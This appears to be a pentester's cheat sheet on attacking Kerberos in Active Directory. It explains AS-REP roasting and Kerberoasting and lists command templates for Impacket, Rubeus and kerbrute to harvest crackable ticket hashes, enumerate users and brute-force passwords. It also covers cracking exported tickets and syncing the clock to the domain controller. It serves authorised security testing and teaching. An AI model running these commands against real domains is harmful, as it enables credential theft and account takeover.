TCP 88: Kerberos

Kerberos is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.

-- Wikipedia

AS-REP Roasting

If Kerberos preauthentication is disabled for a user, the Key Distribution Center (KDC) just issues a Ticket Granting Ticket (TGT) for any user we request (AS_REQ). Part of the reply (AS_REP) is encryted using the users password, and can then be cracked offline.

See also YouTube - Conda - Attacking Active Directory - AS-REP Roasting.

Requirements

  • Only works on user accounts that have Kerberos preauthentication disabled

  • List of potential usernames (may be queried from LDAP using a domain account)

Impacket

GetNPUsers.py <domain>/<username> -dc-ip <ip>

Rubeus

Rubeus.exe asreproast /user:<username> /dc:<ip> /domain:<domain> /outfile:hashes.txt /format:hashcat

kerbrute

A tool to perform Kerberos pre-auth bruteforcing GitHub - ropnop/kerbrute

Enumerate users

./kerbrute_linux_386 userenum -d <domain> --dc <domaincontroller> <usernames.txt>

bruteforce password of one user

./kerbrute_linux_386 bruteuser -d <domain> --dc <domaincontroller> <password-list> <username@domain>

Kerberoasting

If we have access to any user account on the domain, we can request (TGS_REQ) Ticket Granting Service (TGS) tickets for any service account (using SPN). The reply (TGS_REP) contains the TGS, encrypted with the service accounts password, that can then be cracked offline.

See also YouTube - Conda - Attacking Active Directory - Kerberoasting

Requirements

  • Only works on service accounts that have a Service Principal Name (SPN) set

  • Creds/User account on the domain (low priv is sufficient)

Impacket

GetUserSPNs <domain>/<username> -dc-ip <ip> -request

Rubeus

TODO

kerberoast

sudo apt install kerberoast

Use exported tickets from Mimikatz

python /usr/share/kerberoast/tgsrepcrack.py <wordlist> <exported-tickets-file>

Sync time

It's necessary to sync the client time to the domain controller.

Error (when not synced)

SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

ntpdate

ntpdate <dc-ip>

Manually

Get server time

nmap -sC -sV <ip>
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-20T00:14:12
|_  start_date: N/A

Set local time accordingly

date -s "20 Mar 2020 00:14:12+00:00"

Last updated